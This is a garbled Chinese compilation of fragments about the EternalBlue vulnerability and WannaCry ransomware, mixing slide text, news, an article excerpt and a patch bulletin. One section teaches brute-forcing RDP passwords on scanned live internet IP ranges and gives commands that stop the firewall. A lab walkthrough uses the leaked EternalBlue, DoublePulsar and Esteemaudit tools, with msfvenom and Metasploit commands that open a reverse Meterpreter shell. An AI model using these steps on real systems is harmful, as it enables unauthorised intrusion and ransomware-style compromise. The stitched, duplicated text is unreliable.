永恒之蓝3389漏洞原理详解解析
永恒之蓝3389漏洞原理详解
永恒之蓝3389漏洞原理详解实验环境操作机:Windows XPo IP : 172.16.11.2操作机:Kali Linuxo IP : 172.16.12.2目标机:Windows 7 64位o IP : 172.16.12.3目标机:Windows Server 2003o IP : 172.16.12.4掌握工具的用法以及临时防御措施实验步骤实验工具Metasploit:是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程等Equation Group T ools:这是一个集成的工具包,里面包含了IIS6.0、445端口、3 389端口、Rootkit等远程利用工具,本次试验我们主要用到它的445端口远程入侵功能,以及3389远程端口入侵功能。
实验内容Shadow Brokers再次暴露出一份震惊世界的机密文档,其中包含了多个W indows 远程漏洞利用工具,可以覆盖大量的Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用,考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用Wi ndows 服务器,这次事件影响力堪称网络大地震。
影响版本全球70% 的Windows 服务器,包括Windows NT、Windows 2000、Windo ws XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0危害攻击者通过执行脚本,使目标主机蓝屏重启,获取Windows目标主机权限,对目标机器进行任意操作,攻击成本和利用条件都很低,只需在本地执行脚本,并设置相关参数。
389爆破服务器全过程 图解 个人翻译英文 非常详细
3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat -an命令可以查看该端口的开启。
对于一个账户如果账号密码过于弱很容易被爆破到,一般默认账号为Administrator,极少会是admin,而对于过于简单的密码,在3389密码字典中均可找到,下面来讲解爆破3389服务器,获得一台服务器的全过程。
工具:DUbrute3.0爆破工具(或者用frdpb) SYN扫描工具IP Search 1.首先用IP seacher搜索一段活跃的IP段,也可以在百度搜索活跃3389IP段,其次就是SYN扫描,最好是在server2003的服务器或者虚拟机下扫描,如果硬要在XP系统下扫描,那么先让XP支持SYN扫描,将支持SYN补丁tcpip复制到C:\Windows\System32\Drives目录下,重启后即可进行SYN扫描,对于刚装好的server2003系统先对以下服务进行操。
sc config LmHosts start= auto sc config RpcLocator start= autosc config NtlmSsp start= autosc config lanmanserver start= autosc config SharedAccess start= disablednet start LmHosts 2>nul net start RpcLocator 2>nul net start NtlmSsp 2>nul net start lanmanserver 2>nul net stop SharedAccess >nul 2>nul //*停止防火墙2.将IP seach下的IP段复制到SYN扫描器下的ip.txt中,开始扫描一段时间。
扫描完毕后生产ips文档,IPS文档中的IP就是开启3389端口的IP。
永恒之蓝
事件经过
2017年5月12日起,全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子 通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。五个小时内,包括英国、俄 罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解 密恢复文件,对重要数据造成严重损失。
谢谢观看
永恒之蓝
网络攻击工具
01 事件经过
03 事件影响
目录
02 攻击方式 04 病毒防范
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中 包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子 通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型 企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
事件影响
乌克兰、俄罗斯、西班牙、法国、英国等多国均遭遇到袭击,包括政府、银行、电力系统、通讯系统、能源 企业、机场等重要基础设施都被波及,律师事务所DLA Piper的多个美国办事处也受到影响。中国亦有跨境企业 的欧洲分部中招。
病毒防范
微软已于2017年发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新Windows系统补 丁;务必不要轻易打开doc、rtf等后缀的附件;内网中存在使用相同账号、密码情况的机器请尽快修改密码,未 开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作,可以下载“永恒之蓝”漏洞修复工具进行漏 洞修复。
被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半 年后如果还没支付的穷人可以参加免费解锁的活动。原来以为这只是个小范围的恶作剧式的勒索软件,没想到该 勒索软件大面积爆发,许多高校学生中招,愈演愈烈。
永恒之蓝病毒是什么入侵原理
永恒之蓝病毒是什么入侵原理在去年,全球爆发大规模蠕虫勒索病毒入侵事件,被入侵的用户需支付高额的赎金(或比特币)才能解密文件,目前攻击已造成多处教学系统、医院系统瘫痪。
虽然早已被控制,不过一些网友还是很好奇到底是个什么病毒,能造成全球性计算机安全威胁。
什么是永恒之蓝病毒?据了解,这次事件是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。
这次的“永恒之蓝”勒索蠕虫,是NSA网络军火民用化的全球第一例。
一个月前,第四批NSA相关网络攻击工具及文档被Shadow Brokers组织公布,包含了涉及多个Windows系统服务(SMB、RDP、IIS)的远程命令执行工具,其中就包括“永恒之蓝”攻击程序。
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
目前,“永恒之蓝”传播的勒索病毒以ONION和WNCRY两个家族为主,受害机器的磁盘文件会被篡改为相应的后缀,图片、文档、视频、压缩包等各类资料都无法正常打开,只有支付赎金才能解密恢复。
这两类勒索病毒,勒索金额分别是5个比特币和300美元,折合人民币分别为5万多元和2000多元。
安全专家还发现,ONION勒索病毒还会与挖矿机(运算生成虚拟货币)、远控木马组团传播,形成一个集合挖矿、远控、勒索多种恶意行为的木马病毒“大礼包”,专门选择高性能服务器挖矿牟利,对普通电脑则会加密文件敲诈钱财,最大化地压榨受害机器的经济价值。
没有关闭的445端口“引狼入室”据360企业安全方面5月13日早晨提供的一份公告显示,由于以前国内多次爆发利用445端口传播的蠕虫,部分运营商在主干网络上封禁了445端口,但是教育网及大量企业内网并没有此限制而且并未及时安装补丁,仍然存在大量暴露445端口且存在漏洞的电脑,导致目前蠕虫的泛滥。
基于“永恒之蓝”漏洞的渗透攻击与系统安全加固
61《广播电视网络》 2021年第2期 总第374期1 引言为满足当前广电业务不断融合发展的需要,虚拟化、云平台、大数据系统、IP 化播出前端和制作中心等设备和应用相继投入使用。
与此同时,网络安全面临越来越严重的挑战,大量系统和应用漏洞被发布与利用,其中以“永恒之蓝”漏洞最具代表性。
“永恒之蓝”利用Windows 操作系统SMB 服务漏洞获取系统的最高权限,对应微软公司编号MS17-010。
不法分子通过改造“永恒之蓝”制作了WannaCry 勒索病毒,该病毒利用Windows 操作系统445端口存在的漏洞进行传播,并且具有自我复制、主动传播性。
被WannaCry 勒索病毒入侵后,用户主机、服务器操作系统内的图片、文档、音频、视频、数据等都会被加密,并在桌面弹出勒索对话框,要求受害者支付比特币作为赎金,才能解密并释放被加密的数据。
时至今日,各种新型勒索病毒不断涌现,攻击目标不再限于Windows 操作系统,Linux 操作系统也未能幸免,并且新型勒索病毒对攻击目标的选择越来越精准、隐蔽性越来越强,可以长期潜伏于受害者的内部网络中,当感染的主机和服务器达到一定数量后集中暴发,有的勒索病毒甚至可以预判并删除备份数据,再加密当前运行数据,给企业和用户带来巨大的损失。
基于以上原因,我们非常有必要了解“永恒之蓝”漏洞的攻击方式,从而加固防御系统。
2 信息收集阶段使用NMAP 对局域网靶机进行扫描,发现局域网内靶机开放端口445。
使用Nessus 对靶机进行扫描,扫描结果证明靶机存在MS17-010漏洞。
3 渗透攻击阶段首先,在Kali Linux 中启动Metasploit Framework。
其次,寻找“永恒之蓝”相关可利用模块。
执行命令“msf 6 > search ms17-010”,发现存在扫描模块“auxiliary/scanner/smb/smb_ms17_010”和攻击模块“exploit/基于“永恒之蓝”漏洞的 渗透攻击与系统安全加固姜巍 天津广播电视网络有限公司摘要:在广电网络多业务平台融合发展的大背景下,网络安全面临越来越严重的挑战。
WINDOWS远程桌面管理(3389)爆出严重漏洞
此安全更新可解决远程桌面协议中两个秘密报告的漏洞。
如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码。
默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP)。
没有启用 RDP 的系统不受威胁。
对于 Microsoft Windows 所有受支持的版本,此安全更新的等级为严重。
有关详细信息,请参阅本节中受影响和不受影响的软件小节。
该安全更新通过修改远程桌面协议处理内存中数据包的方式以及 RDP 服务处理数据包的方式来解决漏洞。
有关这些漏洞的详细信息,请参阅下一节漏洞信息下面特定漏洞条目的常见问题 (FAQ)小节。
建议。
大多数客户均启用了自动更新,他们不必采取任何操作,因为此安全更新将自动下载并安装。
尚未启用自动更新的客户必须检查更新,并手动安装此更新。
有关自动更新中特定配置选项的信息,请参阅 Microsoft 知识库文章 294871。
对于管理员、企业安装或者想要手动安装此安全更新的最终用户,Microsoft 建议客户使用更新管理软件立即应用此更新或者利用 Microsoft Update 服务检查更新。
永恒之蓝原理
永恒之蓝原理永恒之蓝(EternalBlue)是一种利用Windows操作系统漏洞的攻击工具,最初由美国国家安全局(NSA)开发,后来被黑客组织“影子经纪人”(Shadow Brokers)泄露并广泛传播。
这一漏洞主要影响了Windows XP、Windows 7和Windows Server 2008等操作系统,使得黑客可以远程执行恶意代码,对系统进行攻击。
永恒之蓝原理的深入了解对于网络安全和漏洞修复具有重要意义。
永恒之蓝利用的是Windows操作系统中的一个SMB服务漏洞,该漏洞允许攻击者在未经授权的情况下执行任意代码。
SMB(Server Message Block)是一种用于在局域网中共享文件、打印机和串口等资源的协议,而永恒之蓝正是利用了SMB协议的漏洞来实施攻击。
通过发送特制的数据包,攻击者可以在目标系统上执行恶意代码,从而获取系统的控制权。
永恒之蓝原理的核心在于对SMB协议的漏洞利用。
攻击者通过构造特定的数据包,利用SMB协议中的漏洞来实现对目标系统的攻击。
这种攻击方式具有隐蔽性强、攻击面广的特点,使得许多未及时更新补丁的系统容易受到攻击。
而且,由于永恒之蓝的泄露和传播,使得该漏洞的威胁程度大大增加,成为网络安全的一大隐患。
针对永恒之蓝原理所带来的安全威胁,相关厂商和安全专家已经采取了一系列的应对措施。
首先是发布了针对该漏洞的安全补丁,用户可以通过及时更新系统补丁来修复漏洞,提高系统的安全性。
其次是加强对SMB协议的安全配置,限制SMB服务的对外访问,减少攻击面。
此外,网络安全厂商也提供了相应的防护软件和设备,帮助用户及时发现和阻止永恒之蓝攻击。
总的来说,永恒之蓝原理是一种利用Windows操作系统漏洞的攻击方式,对系统安全构成了严重威胁。
理解永恒之蓝的原理,采取有效的防护措施,及时修复漏洞,对于提高系统的安全性至关重要。
希望用户和相关安全人员能够加强对永恒之蓝原理的学习和了解,共同维护网络安全,防范潜在的安全风险。
漏洞“永恒之蓝”
永恒之蓝的危害范围
2017年5月14日,WannaCry 勒索病毒出现了变种:WannaCry 2.0,取消Kill Switch 将会 使传播速度或更快。截止2017年5月15日,WannaCry造成至少有150个国家受到网络攻击,
已经影响到金融,能源,医疗等行业,造成严重的危机管理问题。中国部分Window操作系
万大学生受到影响。
WannaCry,一种电脑软件勒索 病毒。该恶意软件会扫描电脑上 的TCP 445端口以类似于蠕虫病 毒的方式传播,攻击主机并加密 主机上存储的文件,然后要求以 比特币的形式支付赎金。
比特币
永恒之蓝的危害范围
2017年5月12日,WannaCry勒索 病毒事件造成99个国家遭受了攻击 ,其中包括英国、美国、中国、俄 罗斯、西班牙和意大利。
处置方案
1
2
3
4
PART 05
事件总结
事前防护
感谢您的观看
主讲人:石海赟
永恒之蓝
主讲人:石海赟
1
勒索病毒的爆发 勒索病毒的事件分析 勒索病毒的本地行为 勒索病毒的应急处置方案 事件总结
2
3
4
5
PART 01
勒索病毒的爆发
爆发
2017年5月12日勒索病毒全球肆虐 ,波及范围达全球99国。英国、意 大利、俄罗斯等全球99个国家爆发 勒索病毒攻击。我国校园网用户的 电脑大面积遭受攻击,预计有2600
PART 03
勒索病毒的本地行为
本地行为
当用户主机系统被该勒索软件入侵后,弹出如下勒索对话框 ,提示勒索目的并向用户索要比特币。加密系统中的照片、图 片、文档、压缩包、音频、视频、可执行程序等几乎所有类型 的文件,被加密的文件后缀名被统一修改为“.WNCRY”。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
实验环境
•操作机:Windows XP
o IP : 172.16.11.2
•操作机:Kali Linux
o IP : 172.16.12.2
•目标机:Windows 7 64位
o IP : 172.16.12.3
•目标机:Windows Server 2003
o IP : 172.16.12.4
•掌握工具的用法以及临时防御措施
实验步骤
实验工具
•Metasploit:是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程等
•Equation Group Tools:这是一个集成的工具包,里面包含了IIS6.0、445端口、3389端口、Rootkit等远程利用工具,本次试验我们主要用到它的445端口远程入侵功能,以及3389远程端口入侵功能。
实验内容
Shadow Brokers再次暴露出一份震惊世界的机密文档,其中包含了多个W indows 远程漏洞利用工具,可以覆盖大量的Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用,考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用W indows 服务器,这次事件影响力堪称网络大地震。
影响版本
全球70% 的Windows 服务器,包括Windows NT、Windows 2000、Windo
ws XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 200 8、Windows 2008 R2、Windows Server 2012 SP0
危害
攻击者通过执行脚本,使目标主机蓝屏重启,获取Windows目标主机权
限,对目标机器进行任意操作,攻击成本和利用条件都很低,只需在本地执行脚本,并设置相关参数。
一旦攻击成功,攻击者能直接控制目标主机,甚至直接下载数据库,盗取商业机密,很多的政府、事业单位都会受到影响,影响极大,危害不言而喻。
步骤1:利用Eternalblue与Doublepulsar插件,验证445 SMB漏洞我们本步骤利用Eternalblue和Doublepulsar这两个"插件"来获取Windows 7 64位的系统权限。
其中Eternalblue可以利用SMB漏洞,获取Windows 7 系统权限
而Doublepulsar可以加载Metasploit生成的恶意DLL。
我们首先进入cmd命令行,在命令行中进入文件夹:
cd C:\EQGRP_Lost_in_Translation-master/Windows
输入命令:
fb.py //运行python文件
注:在一般情况下需要在工具根目录下创建listeningposts文件夹,否则运行文件时,会报错。
接下来依次填入对应信息:
172.16.12.3//目标IP
172.16.11.2//本地IP
no //取消重定向
c:\logs //指定日志文件目录
继续填入相关新信息:
0//创建一个新项目
Test_Win7 //项目名称
Yes //确认路径
到这里就完成了最基本的信息配置,正式启动了脚本,接下来继续进行配置,这时就要用到第一个插件了,使用命令:
use Eternalblue //使用Eternalblue
注意这里要选择操作系统、系统位数、传输方式,我们分别选择Windows 7、64位、FB传输方式,其他配置信息直接按回车键,保持默认即可。
当看到Eternalblue Succeeded字样,代表成功。
接下来需要用到Metasploit,使用Everything搜索并使用XShell连接到Kali Linu x:
连接成功后,使用如下命令生成恶意DLL:
msfvenom-p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2LPORT= 12399-f dll >win.dll
这时,/home目录下就会生成win.dll文件,然后使用如下命令进入Metasp loit,设置TCP监听端口,用于接受攻击成功后返回的Shell:
msfconsole
use exploit/multi/handler //使用监听模块
set payload windows/x64/meterpreter/reverse_tcp //设置payload
show options //查看配置信息
set LHOST 172.16.12.2//设置本地IP
set LPORT 12399//设置本地端口
run //运行
如图,Metasploit已经成功运行,等待Shell的返回。
现在将之前生成的win.dll文件通过FTP复制到Windows机器上:
首先点击下图中使用红色小框标示的图
标:
本文中,我将dll文件放在C盘根目录:
接下来使用Doublepulsar来加载生成的dll文件。
注:这里系统位数、后门操作、后门路径,我们分别选择64位、RunDL L、c:\win.dll,其他保持默认即可
配置完之后,提示成功。
我们再来查看Metasploit
可以看到,成功的利用了插件,已经获取了Shell。
然后退回操作机cmd命令行下,重新运行fb.py.准备进行下一步骤.
步骤2:利用Esteemaudit插件,验证3389 RDP漏洞
本步骤利用Esteemaudit插件,来验证漏洞存在。
(本步骤的目标地址为17
2.16.12.4)
与上一步骤一样,首先设置基本信息,这里就不在赘述:
基本信息配置完成之后,下面对ESTEEMAUDIT 插件进行配置:
use ESTEEMAUDIT //使用ESTEEMAUDIT插件
这里我将CallbackPort设置为8899端口(其他端口也可
以)
手动加载rudo_x86.dll和capa_x86.dll,因为插件默认选项都在D盘,它不能识别安装目录,我们复制之前位置,位于C:\EQGRP_Lost_in_Translation-master\windo ws\storage,如
图:
手动加载lipa_x86.dll,原因同
上:
其他保持默认即可。
可以看到,成功执行。
(同学们也可以使用3389端口对Windows Server 2003进行登录,目标IP为172.16.12.4,账号密码为[administrator,ichunqiu123. ],使用命令netstat -ant 查看是否成功连接)
实验结果分析与总结
本次实验我们成功的使用工具Eternalblue、Doublepulsar、ESTEEMAUDIT对SMB、RDP协议漏洞进行了演示攻击。
临时修复方案
•使用防火墙过滤/关闭137、139、445端口。
•对于3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。
•升级补丁,更新系统。
思考
本文中对445和3389端口进行了验证,请在课下尝试对其他的协议、Payl oad以及其他系统进行尝试。